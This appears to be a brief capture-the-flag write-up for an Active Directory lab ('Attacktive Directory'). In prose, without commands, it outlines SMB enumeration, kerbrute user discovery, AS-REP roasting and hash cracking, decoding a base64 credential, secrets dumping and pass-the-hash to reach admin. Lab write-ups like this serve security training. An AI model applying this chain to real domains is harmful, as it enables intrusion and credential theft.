Attacktive Directory
AS-REP Roasting - SMB Enumeration - Dumping Secrets
Enumeration
Starting off with the scan
The Top Level Domain Name is spookysec.local and we see a bunch of services - DNS, IIS, Kerberos, RPC, netbios etc
Let's start enumerating port 139 & 445 :)
Found Domain Name - THM-AD
Tried accessing some shares via anonymous login - Failed, This challenge provides us with a set of username and passwords so let's utilize that for our further move :)
We will be bruteforcing the DC using kerbrute to find valid users
Initial Compromise
We can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting
ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set - This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account
This returns that the user svc-admin can query a ticket with no password
We can now crack this hash using john or hashcat (18200)
We can now continue our enumeration, listing shares etc
This file had a base64 encrypted string, and boom its a username and password !
Privilege Escalation
Wai whattttt, don't tell me this is the DC's backup account :) - Let's try dumping some secrets with this creds and check tho
We dumped the Administrator's NTLM hash, we can now pass this hash and gain admin privileges !
Last updated
